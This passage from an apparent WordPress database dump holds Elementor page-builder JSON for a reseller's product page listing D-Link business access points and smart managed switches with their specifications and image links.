]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7649,3421,'_elementor_version','2.5.14'),(7650,3421,'_elementor_edit_mode','builder'),(7653,3422,'_wp_page_template','template-fullwidth.php'),(7654,3422,'_elementor_template_type','post'),(7655,3422,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e75b16a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"0a878f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" 